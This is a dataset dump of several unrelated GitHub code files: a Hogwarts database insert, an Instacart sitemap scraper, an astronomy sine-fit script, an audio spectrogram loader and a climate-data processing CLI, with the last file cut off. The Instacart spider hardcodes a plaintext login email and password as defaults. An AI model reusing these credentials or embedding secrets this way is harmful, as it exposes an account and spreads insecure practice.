'Apparition']\n\nstudent = {\"first_name\": \"Jenna\",\n \"last_name\": \"Kayla\",\n \"creation_time\": datetime.datetime.now(),\n \"update_time\": datetime.datetime.now(),\n \"existing_skills\": {magic_skills[2]: 3},\n \"desired_skills\": {magic_skills[4]: 5},\n \"interested_in_courses\": [all_courses[3]]\n }\n\n\nstudent_id = collection.insert_one(student)", "repo_name": "selimmizrahi/Hogwarts_project", "sub_path": "db/addUser.py", "file_name": "addUser.py", "file_ext": "py", "file_size_in_byte": 1171, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymongo.MongoClient", "line_number": 5, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "41790996995", "text": "import csv\nfrom urlparse import urljoin\n\nimport requests\nfrom lxml import etree\n\nfrom . 
import SitemapSpider, SitemapSpiderError\n\n\nclass InstacartSitemapSpider(SitemapSpider):\n retailer = 'instacart.com'\n\n default_login = 'final.fantasy.dev@gmail.com'\n default_password = 'haha123.'\n default_store = 'costco'\n\n home_url = 'https://www.instacart.com/'\n sign_in_url = 'https://www.instacart.com/accounts/login'\n retailers_url = 'https://www.instacart.com/v3/retailers'\n departments_url = 'https://www.instacart.com/v3/retailers/{retailer_id}/containers'\n department_url = 'https://www.instacart.com/v3/containers/{container}'\n item_url = 'https://www.instacart.com/store/items/{item_id}'\n\n def task_sitemap_to_item_urls(self, options):\n session = self._sign_in(options)\n\n retailer_id = self._get_retailer_id(options, session)\n if not retailer_id:\n raise SitemapSpiderError('Store not found')\n\n departments = self._get_departments(retailer_id, session)\n\n with open(self.get_file_path_for_result('item_urls.csv'), 'w') as item_urls_file:\n item_urls_csv = csv.writer(item_urls_file)\n\n item_ids_seen = set()\n\n for department in departments:\n for item_id in self._load_items(department, session):\n if item_id not in item_ids_seen:\n item_url = self.item_url.format(item_id=item_id)\n\n item_urls_csv.writerow([item_url])\n item_ids_seen.add(item_id)\n\n def _sign_in(self, options):\n self.logger.info('Authentication..')\n\n session = requests.Session()\n\n response = session.get(self.home_url)\n self._check_response(response, raise_error=True, session=session)\n\n tree = etree.HTML(response.content)\n token = tree.xpath(\".//meta[@name='csrf-token']/@content\")\n\n if token:\n token = token[0]\n else:\n raise SitemapSpiderError('Can not parse auth token')\n\n login = options.get('login') or self.default_login\n password = options.get('password') or self.default_password\n\n sign_in_data = {\n 'user': {\n 'email': login,\n 'password': password\n },\n 'authenticity_token': token\n }\n\n response = session.post(self.sign_in_url, json=sign_in_data, headers={'Accept': 'application/json'})\n self._check_response(response, raise_error=True, session=session)\n\n self.logger.info('Success')\n\n return session\n\n def _get_retailer_id(self, options, session):\n store = options.get('store') or self.default_store\n self.logger.info('Loading retailer id for store: {}'.format(store))\n\n response = session.get(self.retailers_url)\n self._check_response(response, raise_error=True, session=session)\n\n retailers = response.json().get('retailers')\n if not retailers:\n raise SitemapSpiderError('List of retailers is empty')\n\n for retailer in retailers:\n if store in (retailer.get('slug'), retailer.get('name')):\n return retailer.get('id')\n\n def _get_departments(self, retailer_id, session):\n self.logger.info('Loading departments for retailer id: {}'.format(retailer_id))\n\n response = session.get(self.departments_url.format(retailer_id=retailer_id))\n self._check_response(response, raise_error=True, session=session)\n\n containers = response.json().get('containers')\n if not containers:\n raise SitemapSpiderError('List of departments is empty')\n\n departments = []\n\n while True:\n if not containers:\n break\n\n container = containers.pop(0)\n\n if 'virtual' not in container.get('attributes', []):\n departments.append(container.get('path'))\n\n if container.get('containers'):\n containers.extend(container['containers'])\n\n return departments\n\n def _load_items(self, department, session):\n self.logger.info('Loading items for department: {}'.format(department))\n\n response = 
session.get(self.department_url.format(container=department))\n        self._check_response(response, raise_error=True, session=session)\n\n        modules = response.json().get('container', {}).get('modules')\n        if not modules:\n            raise SitemapSpiderError('List of modules is empty')\n\n        start_url = self._get_start_url(modules)\n\n        if start_url:\n            start_url = urljoin(self.home_url, start_url)\n\n            self.logger.info('Scraping shelf page: {}'.format(start_url))\n\n            next_page = 1\n\n            while next_page:\n                self.logger.info('Page: {}'.format(next_page))\n\n                response = session.get(start_url, params={'page': next_page, 'per': 30})\n                self._check_response(response, raise_error=True, session=session)\n\n                data = response.json().get('module_data', {})\n\n                for item in data.get('items', []):\n                    yield item.get('id')\n\n                next_page = data.get('pagination', {}).get('next_page')\n        else:\n            self.logger.warn('There is no shelf url')\n\n    def _get_start_url(self, modules):\n        for mod in modules:\n            if 'items_grid' in mod.get('types', []):\n                return mod.get('async_data_path')\n", "repo_name": "aprosdev/ecom-predictor", "sub_path": "sitemap_utilities/sitemap_service/app/spiders/instacart.py", "file_name": "instacart.py", "file_ext": "py", "file_size_in_byte": 5459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "csv.writer", "line_number": 34, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 49, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 54, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 54, "usage_type": "name"}, {"api_name": "urlparse.urljoin", "line_number": 134, "usage_type": "call"}]} +{"seq_id": "15495380749", "text": "# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndata = np.loadtxt('RV_data.txt',skiprows=17, usecols=(0,1,2,3,4))\nBJD = data[:,0] #Barycentric Julian Date\nRad_velocity = data[:,1] #Radial velocity\nRV_uncertainty = data[:,2] #Uncertainty in target radial velocity\nBisector_Span = data[:,3] #bisector span\nBS_uncertainty = data[:,4] #uncertainty in bisector span\n\nPeriod = 3.5485 #days\nt_0 = BJD[0]\nfolded_time = np.zeros_like(BJD)\n\nfor i in range(len(BJD)):\n    folded_time[i] = (BJD[i] - t_0) % Period\n    \nfreq = (2*np.pi)/Period\nphase = 1.5\namp = Rad_velocity[0]\n\ndef sine(amp,freq,time,phase):\n    '''\n    sine model to fit to the points\n    -----\n    parameters:\n    amp: amplitude of sine wave\n    freq: frequency of sine wave\n    time: list of time of the data\n    phase: phase of sine wave\n    '''\n    model = np.zeros_like(time)\n    for i in range(len(time)):\n        model[i] = amp*np.sin(freq*time[i] + phase)\n    return model\n\nplt.plot(folded_time, Rad_velocity, '.')\n#fitted plot \nplt.plot(sorted(folded_time), sine(amp,freq,sorted(folded_time),phase), 'g', label='after fitting')\nplt.ylim(-300, 200)\nplt.xlabel('Time BJD')\nplt.ylabel('Radial Velocity')\nplt.title('Keck-HIRES Radial Velocity Data')\nplt.savefig('hw7bonusplot.png')", "repo_name": "SarahV4775/Comp.-Meth.-for-Astrophysics-HW", "sub_path": "HW 7/HW7bonus.py", "file_name": "HW7bonus.py", "file_ext": "py", "file_size_in_byte": 1306, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.loadtxt", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 20, "usage_type": "attribute"}, 
{"api_name": "numpy.zeros_like", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "19846313177", "text": "import csv\nimport wave\nfrom scipy.io import wavfile\nimport numpy as np\nimport os\nfrom scipy import signal\nfrom scipy.signal import stft\nimport matplotlib.pyplot as plt\nfrom glob import glob\nimport pyaudio\nimport wave\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport random\nfrom keras.utils import to_categorical\n\n# open folders -> take files .wav\n# wav -> spectrograms\n# save spectrograms in folders\n# load data to train/validate/test\n\nFS = 44100\n\nclass DataLoader():\n\n    def generate_data(self):\n        DIR = 'data'\n        wav_files = glob(os.path.join(DIR, '*/*wav'))\n        wav_files = [x.split(sep='\\\\')[1] + '/' + x.split(sep='\\\\')[2] for x in wav_files]\n        data = []\n\n        for e in wav_files:\n            label, name = e.split('/')\n            file = os.path.join(DIR, e)\n            f, t, Zxx = self.wave_to_spec(file)\n            # If it is longer than 100 frames\n            # if Zxx.shape[1] > 100:\n            print(\"[\", Zxx.shape[0], ' ,', Zxx.shape[1], \"]\")\n            filepath = os.path.join(DIR, label, 'data_csv')\n            self.save_spec_to_csv(Zxx, filepath, name)\n            # self.plot_spectrogram(f, t, Zxx, file)\n            # else:\n            #     continue\n\n    # normalization\n    def normalize(self, data):\n        data = data / np.max(data)\n        return data\n\n    # audio file that's shorter than 44100 samples is filled with 0's\n    def pad_audio(self, y, fs):\n        if len(y) >= fs: return y\n        else: return np.pad(y, pad_width=(fs - len(y), 0), mode='constant', constant_values=(0,0))\n\n    # audio file that is longer than 44100 is randomly cut to 1s duration\n    def chop_audio(self, y, fs):\n        if len(y) <= fs: return y\n        else:\n            beginSample = np.random.randint(0, len(y) - fs)\n            return y[beginSample : (beginSample + fs)]\n\n    # preemphasis filtering\n    def preemphasis_filtering(self, data, pre_emphasis=0.97):\n        pre_emphasis = 0.97\n        data = np.append(data[0], data[1:] - pre_emphasis * data[:-1])\n        return data\n\n    def read_wave(self, wav_name):\n        obj = wave.open(wav_name, 'r')\n        num_of_channels = obj.getnchannels()\n        if num_of_channels == 1:\n            fs, y = wavfile.read(wav_name)\n            return fs, y\n\n    # fs=44100\n    def wave_to_spec(self, wav_name, bLog_spec=True, threshold_freq_down = None, threshold_freq_up = None):\n        fs, y = self.read_wave(wav_name)\n        # resampling\n        if fs != 16000:\n            # (signal, amount of samples in resampled 
signal)\n            print(fs)\n            fs_new = 16000\n            y = signal.resample(y, int((fs_new/fs) * y.shape[0]))\n            print('New signal length: ', len(y))\n            fs = fs_new\n        y = self.pad_audio(y, fs)\n        y = self.chop_audio(y, fs)\n        y = self.normalize(y)\n        y = self.preemphasis_filtering(y)\n        y = self.change_zero_to_something_small(y)\n        # STFT\n        f, t, Zxx = stft(y, fs, window='hann')\n        # LOW PASS\n        if threshold_freq_up is not None:\n            Zxx = Zxx[f <= threshold_freq_up, :]\n            f = f[f <= threshold_freq_up]\n        # HIGH PASS\n        if threshold_freq_down is not None:\n            Zxx = Zxx[f >= threshold_freq_down, :]\n            f = f[f >= threshold_freq_down]\n        # Logarithm of spectrogram\n        if bLog_spec:\n            Zxx_log = np.log(np.abs(Zxx))\n            return f, t, Zxx_log\n        else:\n            return f, t, Zxx\n\n    def plot_spectrogram(self, f, t, Zxx, name):\n        plt.pcolormesh(t, f, Zxx)\n        plt.title(name)\n        plt.show()\n\n    def change_zero_to_something_small(self, x):\n        for i in range(len(x)):\n            if x[i] == 0:\n                x[i] = random.uniform(0.0000001, 0.0000002)\n        return x\n\n    def save_spec_to_csv(self, Zxx, filepath, filename):\n        if not os.path.isdir(filepath):\n            os.mkdir(filepath)\n            print(\"Successfully created the directory %s\" % filepath)\n\n        # CSV\n        with open((filepath + '\\\\' + filename + '.csv'), \"w+\", newline='') as csv_file:\n            csv_writer = csv.writer(csv_file, delimiter=' ')\n            csv_writer.writerows(Zxx)\n\ndl = DataLoader()\ndl.generate_data()", "repo_name": "zhangwq740/CNN-speech-classification", "sub_path": "DataLoader.py", "file_name": "DataLoader.py", "file_ext": "py", "file_size_in_byte": 4232, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "glob.glob", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.append", "line_number": 65, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 69, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.read", "line_number": 72, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 72, "usage_type": "name"}, {"api_name": "scipy.signal.resample", "line_number": 83, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 83, "usage_type": "name"}, {"api_name": "scipy.signal.stft", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pcolormesh", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 111, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 121, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "70264197636", "text": "from collections import defaultdict\nimport logging\nimport os\nfrom pathlib import Path\nimport re\nimport subprocess\nimport sys\nimport yaml\n\nfrom codetiming import Timer\nimport typer\nimport xarray as xr\n\nfrom mlde_utils import VariableMetadata\nfrom .options import DomainOption, CollectionOption\nfrom ..moose import (\n    VARIABLE_CODES,\n    raw_nc_filepath,\n    processed_nc_filepath,\n    remove_forecast,\n    remove_pressure,\n)\nfrom ..preprocessing.coarsen import Coarsen\nfrom ..preprocessing.constrain import Constrain\nfrom ..preprocessing.diff import Diff\nfrom ..preprocessing.regrid import Regrid\nfrom ..preprocessing.remapcon import Remapcon\nfrom ..preprocessing.select_domain import SelectDomain\nfrom ..preprocessing.shift_lon_break import ShiftLonBreak\nfrom ..preprocessing.sum import Sum\nfrom ..preprocessing.vorticity import Vorticity\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO, format=\"%(levelname)s %(asctime)s: %(message)s\")\n\napp = typer.Typer()\n\n\n@app.callback()\ndef callback():\n    pass\n\n\ndef get_variable_resolution(config, collection):\n    if config[\"sources\"][\"type\"] == \"moose\":\n        if collection == CollectionOption.cpm:\n            variable_resolution = \"2.2km\"\n        elif collection == CollectionOption.gcm:\n            variable_resolution = \"60km\"\n        else:\n            raise ValueError(f\"Unknown collection {collection}\")\n    elif config[\"sources\"][\"type\"] == \"bp\":\n        # assume bp sourced data is at the desired resolution already\n        if collection == CollectionOption.cpm:\n            variable_resolution = \"2.2km-coarsened-gcm\"\n        elif collection == CollectionOption.gcm:\n            variable_resolution = \"60km\"\n        else:\n            raise ValueError(f\"Unknown collection {collection}\")\n\n    return variable_resolution\n\n\ndef get_sources(\n    config,\n    collection,\n    year,\n    data_basedir,\n    domain,\n    target_size,\n    variable_resolution,\n    target_resolution,\n    ensemble_member,\n):\n    sources = {}\n\n    if config[\"sources\"][\"type\"] == \"moose\":\n        if collection == CollectionOption.cpm:\n            source_domain = \"uk\"\n        elif collection == CollectionOption.gcm:\n            source_domain = \"global\"\n        else:\n            raise ValueError(f\"Unknown collection {collection}\")\n        # ds = xr.open_mfdataset([raw_nc_filepath(variable=source, year=year, frequency=frequency) for source in config['sources']['moose']])\n        # for source in config['sources']['moose']:\n        #     if \"moose_name\" in VARIABLE_CODES[source]:\n        #         logger.info(f\"Renaming {VARIABLE_CODES[source]['moose_name']} to {source}...\")\n        #         ds = ds.rename({VARIABLE_CODES[source][\"moose_name\"]: source})\n\n        for src_variable in config[\"sources\"][\"variables\"]:\n            source_nc_filepath = raw_nc_filepath(\n                variable=src_variable[\"name\"],\n                year=year,\n                frequency=src_variable[\"frequency\"],\n                resolution=variable_resolution,\n                collection=collection.value,\n                domain=source_domain,\n                ensemble_member=ensemble_member,\n            )\n            logger.info(f\"Opening {source_nc_filepath}\")\n            ds = xr.open_dataset(source_nc_filepath)\n\n            if \"moose_name\" in VARIABLE_CODES[src_variable[\"name\"]]:\n                logger.info(\n                    f\"Renaming {VARIABLE_CODES[src_variable['name']]['moose_name']} to {src_variable['name']}...\"\n                
)\n                ds = ds.rename(\n                    {\n                        VARIABLE_CODES[src_variable[\"name\"]][\n                            \"moose_name\"\n                        ]: src_variable[\"name\"]\n                    }\n                )\n\n            # remove forecast related coords that we don't need\n            ds = remove_forecast(ds)\n            # remove pressure related dims and encoding data that we don't need\n            ds = remove_pressure(ds)\n\n            sources[src_variable[\"name\"]] = ds\n    elif config[\"sources\"][\"type\"] == \"bp\":\n        for src_variable in config[\"sources\"][\"variables\"]:\n            source_metadata = VariableMetadata(\n                data_basedir,\n                frequency=src_variable[\"frequency\"],\n                domain=f\"{domain.value}-{target_size}\",\n                resolution=f\"{variable_resolution}-{target_resolution}\",\n                ensemble_member=ensemble_member,\n                variable=src_variable[\"name\"],\n            )\n            source_nc_filepath = source_metadata.filepath(year)\n            logger.info(f\"Opening {source_nc_filepath}\")\n            ds = xr.open_dataset(source_nc_filepath)\n\n            ds = remove_pressure(ds)\n\n            sources[src_variable[\"name\"]] = ds\n    else:\n        raise RuntimeError(f\"Unknown source type {config['sources']['type']}\")\n\n    logger.info(f\"Combining {config['sources']}...\")\n    ds = xr.combine_by_coords(\n        sources.values(),\n        compat=\"no_conflicts\",\n        combine_attrs=\"drop_conflicts\",\n        coords=\"all\",\n        join=\"inner\",\n        data_vars=\"all\",\n    )\n\n    return ds\n\n\n@app.command()\n@Timer(name=\"create-variable\", text=\"{name}: {minutes:.1f} minutes\", logger=logger.info)\ndef create(\n    config_path: Path = typer.Option(...),\n    year: int = typer.Option(...),\n    frequency: str = \"day\",\n    domain: DomainOption = DomainOption.london,\n    scenario=\"rcp85\",\n    scale_factor: str = typer.Option(...),\n    target_resolution: str = \"2.2km\",\n    target_size: int = 64,\n    ensemble_member: str = typer.Option(...),\n):\n    \"\"\"\n    Create a new variable from moose data\n    \"\"\"\n    with open(config_path, \"r\") as config_file:\n        config = yaml.safe_load(config_file)\n\n    # add cli parameters to config\n    config[\"parameters\"] = {\n        \"frequency\": frequency,\n        \"domain\": domain.value,\n        \"scenario\": scenario,\n        \"scale_factor\": scale_factor,\n        \"target_resolution\": target_resolution,\n    }\n\n    data_basedir = os.path.join(os.getenv(\"DERIVED_DATA\"), \"moose\")\n\n    collection = CollectionOption(config[\"sources\"][\"collection\"])\n\n    variable_resolution = get_variable_resolution(config, collection)\n\n    ds = get_sources(\n        config,\n        collection,\n        year,\n        data_basedir,\n        domain,\n        target_size,\n        variable_resolution,\n        target_resolution,\n        ensemble_member=ensemble_member,\n    )\n\n    for job_spec in config[\"spec\"]:\n        if job_spec[\"action\"] == \"sum\":\n            logger.info(f\"Summing {job_spec['params']['variables']}\")\n            ds = Sum(**job_spec[\"params\"]).run(ds)\n            ds[config[\"variable\"]] = ds[config[\"variable\"]].assign_attrs(\n                config[\"attrs\"]\n            )\n        elif job_spec[\"action\"] == \"diff\":\n            logger.info(\n                f\"Difference between {job_spec['params']['left']} and {job_spec['params']['right']}\"\n            )\n            ds = Diff(**job_spec[\"params\"]).run(ds)\n            ds[config[\"variable\"]] = ds[config[\"variable\"]].assign_attrs(\n                config[\"attrs\"]\n            )\n        elif job_spec[\"action\"] == \"coarsen\":\n            if scale_factor == \"gcm\":\n                typer.echo(f\"Remapping conservatively to gcm grid...\")\n                variable_resolution = f\"{variable_resolution}-coarsened-gcm\"\n                # pick the target grid based on the job spec\n                # some variables use one grid, others a slightly offset one\n                grid_type = job_spec[\"parameters\"][\"grid\"]\n                target_grid_filepath = os.path.join(\n                    os.path.dirname(__file__),\n                    \"..\",\n                    \"target-grids\",\n                    \"60km\",\n                    \"global\",\n                    grid_type,\n                    \"moose_grid.nc\",\n                )\n                ds 
= Remapcon(target_grid_filepath).run(ds)\n            else:\n                scale_factor = int(scale_factor)\n                if scale_factor == 1:\n                    typer.echo(\n                        f\"{scale_factor}x coarsening scale factor, nothing to do...\"\n                    )\n                else:\n                    typer.echo(f\"Coarsening {scale_factor}x...\")\n                    variable_resolution = (\n                        f\"{variable_resolution}-coarsened-{scale_factor}x\"\n                    )\n                    ds, orig_ds = Coarsen(scale_factor=scale_factor).run(ds)\n        elif job_spec[\"action\"] == \"shift_lon_break\":\n            ds = ShiftLonBreak().run(ds)\n        elif job_spec[\"action\"] == \"regrid_to_target\":\n            if target_resolution != variable_resolution:\n                typer.echo(f\"Regridding to target resolution...\")\n                target_grid_filepath = os.path.join(\n                    os.path.dirname(__file__),\n                    \"..\",\n                    \"target-grids\",\n                    target_resolution,\n                    \"uk\",\n                    \"moose_grid.nc\",\n                )\n                kwargs = job_spec.get(\"parameters\", {})\n                ds = Regrid(\n                    target_grid_filepath, variables=[config[\"variable\"]], **kwargs\n                ).run(ds)\n        elif job_spec[\"action\"] == \"vorticity\":\n            typer.echo(f\"Computing vorticity...\")\n            ds = Vorticity(**job_spec[\"parameters\"]).run(ds)\n        elif job_spec[\"action\"] == \"select-subdomain\":\n            typer.echo(f\"Select {domain.value} subdomain...\")\n            ds = SelectDomain(subdomain=domain.value, size=target_size).run(ds)\n        elif job_spec[\"action\"] == \"constrain\":\n            typer.echo(f\"Filtering...\")\n            ds = Constrain(query=job_spec[\"query\"]).run(ds)\n        elif job_spec[\"action\"] == \"rename\":\n            typer.echo(f\"Renaming...\")\n            ds = ds.rename(job_spec[\"mapping\"])\n        else:\n            raise ValueError(f\"Unknown action {job_spec['action']}\")\n\n    assert len(ds.grid_latitude) == target_size\n    assert len(ds.grid_longitude) == target_size\n\n    # there should be no missing values in this dataset\n    assert ds[config[\"variable\"]].isnull().sum().values.item() == 0\n\n    output_metadata = VariableMetadata(\n        data_basedir,\n        frequency=frequency,\n        domain=f\"{domain.value}-{target_size}\",\n        resolution=f\"{variable_resolution}-{target_resolution}\",\n        ensemble_member=ensemble_member,\n        variable=config[\"variable\"],\n    )\n\n    logger.info(f\"Saving data to {output_metadata.filepath(year)}\")\n    os.makedirs(output_metadata.dirpath(), exist_ok=True)\n    ds.to_netcdf(output_metadata.filepath(year))\n    with open(\n        os.path.join(output_metadata.dirpath(), f\"{config['variable']}-{year}.yml\"), \"w\"\n    ) as f:\n        yaml.dump(config, f)\n\n\ndef run_cmd(cmd):\n    logger.debug(f\"Running {cmd}\")\n    output = subprocess.run(cmd, capture_output=True, check=False)\n    stdout = output.stdout.decode(\"utf8\")\n    print(stdout)\n    print(output.stderr.decode(\"utf8\"))\n    output.check_returncode()\n\n\n@app.command()\n@Timer(name=\"xfer-variable\", text=\"{name}: {minutes:.1f} minutes\", logger=logger.info)\ndef xfer(\n    variable: str = typer.Option(...),\n    year: int = typer.Option(...),\n    ensemble_member: str = typer.Option(...),\n    frequency: str = \"day\",\n    domain: DomainOption = DomainOption.london,\n    collection: CollectionOption = typer.Option(...),\n    resolution: str = typer.Option(...),\n    target_size: int = 64,\n):\n    # TODO re-write xfer in Python\n    jasmin_filepath = processed_nc_filepath(\n        variable=variable,\n        year=year,\n        frequency=frequency,\n        domain=f\"{domain.value}-{target_size}\",\n        resolution=resolution,\n        collection=collection.value,\n        ensemble_member=ensemble_member,\n    )\n    bp_filepath = processed_nc_filepath(\n        variable=variable,\n        year=year,\n        frequency=frequency,\n        domain=f\"{domain.value}-{target_size}\",\n        resolution=resolution,\n        collection=collection.value,\n        base_dir=\"/user/work/vf20964\",\n        ensemble_member=ensemble_member,\n    )\n\n    
file_xfer_cmd = [\n f\"{os.getenv('HOME')}/code/mlde-data/moose-etl/xfer-script-direct\",\n jasmin_filepath,\n bp_filepath,\n ]\n # TODO: also transfer to config used for the variable\n # config_xfer_cmd = []\n run_cmd(file_xfer_cmd)\n\n\n@app.command()\ndef validate(\n variable: str = typer.Argument(\"all\"), ensemble_member: str = typer.Argument(\"all\")\n):\n domain_res_vars = {\n \"birmingham-64\": {\n \"2.2km-coarsened-gcm-2.2km-coarsened-4x\": [\n \"psl\",\n # \"tempgrad500250\",\n # \"tempgrad700500\",\n # \"tempgrad850700\",\n # \"tempgrad925850\",\n \"vorticity250\",\n \"vorticity500\",\n \"vorticity700\",\n \"vorticity850\",\n \"vorticity925\",\n \"spechum250\",\n \"spechum500\",\n \"spechum700\",\n \"spechum850\",\n \"spechum925\",\n \"temp250\",\n \"temp500\",\n \"temp700\",\n \"temp850\",\n \"temp925\",\n # \"pr\",\n \"linpr\",\n ],\n \"2.2km-coarsened-4x-2.2km-coarsened-4x\": [\n \"pr\",\n ],\n \"60km-2.2km-coarsened-4x\": [\n \"psl\",\n # \"tempgrad500250\",\n # \"tempgrad700500\",\n # \"tempgrad850700\",\n # \"tempgrad925850\",\n \"vorticity250\",\n \"vorticity500\",\n \"vorticity700\",\n \"vorticity850\",\n \"vorticity925\",\n \"spechum250\",\n \"spechum500\",\n \"spechum700\",\n \"spechum850\",\n \"spechum925\",\n \"temp250\",\n \"temp500\",\n \"temp700\",\n \"temp850\",\n \"temp925\",\n \"linpr\",\n \"pr\",\n ],\n },\n }\n\n years = list(range(1981, 2001)) + list(range(2021, 2041)) + list(range(2061, 2081))\n\n ensemble_members = [\n \"01\",\n \"04\",\n \"05\",\n \"06\",\n \"07\",\n \"08\",\n \"09\",\n \"10\",\n \"11\",\n \"12\",\n \"13\",\n \"15\",\n ]\n\n for domain, res_variables in domain_res_vars.items():\n for res, variables in res_variables.items():\n for em in ensemble_members:\n if (ensemble_member != \"all\") and (ensemble_member != em):\n continue\n for var in variables:\n if (variable != \"all\") and (variable != var):\n continue\n sys.stdout.write(\"\\033[K\")\n print(\n f\"Checking {var} of {em} over {domain} at {res}\",\n end=\"\\r\",\n )\n\n bad_years = defaultdict(set)\n for year in years:\n var_meta = VariableMetadata(\n os.getenv(\"MOOSE_DERIVED_DATA\"),\n variable=var,\n frequency=\"day\",\n domain=domain,\n resolution=res,\n ensemble_member=em,\n )\n\n try:\n ds = xr.load_dataset(var_meta.filepath(year))\n except FileNotFoundError:\n bad_years[\"no file\"].add(year)\n continue\n\n nan_count = ds[var].isnull().sum().values.item()\n\n if nan_count > 0:\n bad_years[\"NaNs\"].add(year)\n\n # check dims\n if list(ds[var].dims) != [\n \"time\",\n \"grid_latitude\",\n \"grid_longitude\",\n ]:\n bad_years[\"bad dimensions\"].add(year)\n\n # check for forecast related metadata (should have been stripped)\n for v in ds.variables:\n if \"coordinates\" in ds[v].encoding and (\n re.match(\n \"(realization|forecast_period|forecast_reference_time) ?\",\n ds[v].encoding[\"coordinates\"],\n )\n is not None\n ):\n bad_years[\"forecast_encoding\"].add(year)\n if v in [\n \"forecast_period\",\n \"forecast_reference_time\",\n \"realization\",\n \"forecast_period_bnds\",\n ]:\n bad_years[\"forecast_vars\"].add(year)\n\n # check for pressure related metadata (should have been stripped)\n for v in ds.variables:\n if \"coordinates\" in ds[v].encoding and (\n re.match(\"(pressure) ?\", ds[v].encoding[\"coordinates\"])\n is not None\n ):\n bad_years[\"pressure_encoding\"].add(year)\n if v in [\"pressure\"]:\n bad_years[\"pressure_vars\"].add(year)\n\n # report findings\n for reason, error_years in bad_years.items():\n if len(error_years) > 0:\n print(\n f\"Failed '{reason}': 
